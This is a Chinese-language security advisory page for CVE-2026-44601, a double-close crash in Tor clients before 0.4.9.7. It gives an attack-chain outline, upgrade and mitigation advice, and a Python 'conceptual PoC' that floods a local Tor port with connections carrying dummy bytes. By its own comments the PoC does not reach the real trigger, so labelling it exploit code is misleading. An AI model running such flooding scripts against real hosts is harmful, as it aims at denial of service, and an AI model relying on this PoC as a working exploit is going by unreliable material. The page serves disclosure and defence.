CVE-2026-44601 CVSS 3.7 低危

CVE-2026-44601 Tor客户端双重关闭导致崩溃漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44601

漏洞类型

拒绝服务

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tor

漏洞概述

CVE-2026-44601 是 Tor 项目中的一个安全漏洞。在版本 0.4.9.7 之前，当 Tor 客户端处于电路队列内存压力状态时，由于存在电路双重关闭的逻辑缺陷，可能导致客户端崩溃。攻击者可利用此漏洞触发拒绝服务条件，中断受害者的匿名网络连接。该漏洞已被分配编号 TROVE-2026-009，主要影响系统的可用性。

技术细节

该漏洞的核心在于 Tor 处理电路生命周期的内存管理错误。具体而言，当 Tor 客户端面临电路队列内存压力时，内部管理电路的数据结构可能会出现状态不一致。攻击者可以通过发送特制的网络数据包或控制电路建立流程，利用这种状态不一致，诱使 Tor 程序对同一个电路对象执行两次关闭操作。这种双重关闭操作通常会导致释放后重用或堆损坏。在 CVSS 3.1 评分标准下，该漏洞的攻击向量为网络，无需用户交互和权限，但由于触发条件较为复杂，利用难度较高。攻击成功后，虽然不会直接影响数据的机密性和完整性，但会破坏进程的内存堆结构，导致 Tor 客户端进程崩溃，从而造成拒绝服务，中断用户的匿名通信。

攻击链分析

STEP 1

侦察

识别网络中运行受影响版本（0.4.9.7 之前）的 Tor 客户端或中继节点。

STEP 2

资源耗尽

向目标发送大量网络请求或构造特定的电路建立请求，迫使目标进入电路队列内存压力状态。

STEP 3

触发漏洞

利用内存压力下的逻辑缺陷，发送特制序列触发电路的双重关闭。

STEP 4

拒绝服务

导致 Tor 客户端进程崩溃，中断匿名通信服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for CVE-2026-44601 (Tor Double Close Crash)
# This script attempts to simulate memory pressure conditions.
# Note: Successful exploitation requires specific timing and internal state.

import socket
import time

def simulate_circuit_pressure(target_host, target_port):
    """
    Simulates creating connections to induce memory pressure.
    In a real scenario, specific cell manipulation triggers the double close.
    """
    print(f"[*] Attempting to target {target_host}:{target_port}")
    
    # Simulate rapid connection attempts to fill circuit queue
    for i in range(100):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(0.5)
            s.connect((target_host, target_port))
            # Sending dummy data that might resemble circuit creation hints
            # Actual payload requires deep knowledge of Tor protocol cells
            payload = b"\x00\x01\x02\x03" 
            s.send(payload)
            s.close()
        except Exception as e:
            pass
        
    print("[+] Simulation finished. Check if Tor process has crashed.")

if __name__ == "__main__":
    # Replace with actual Tor IP and Port (e.g., 127.0.0.1:9050)
    simulate_circuit_pressure("127.0.0.1", 9050)

影响范围

Tor < 0.4.9.7

防御指南

临时缓解措施

建议用户立即将 Tor 软件更新至包含修复补丁的 0.4.9.7 版本。在无法立即升级的情况下，可以通过调整系统资源限制，减少 Tor 进程允许使用的最大内存，或者限制并发电路数量，尽量避免进入电路队列内存压力状态，从而降低漏洞被触发的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表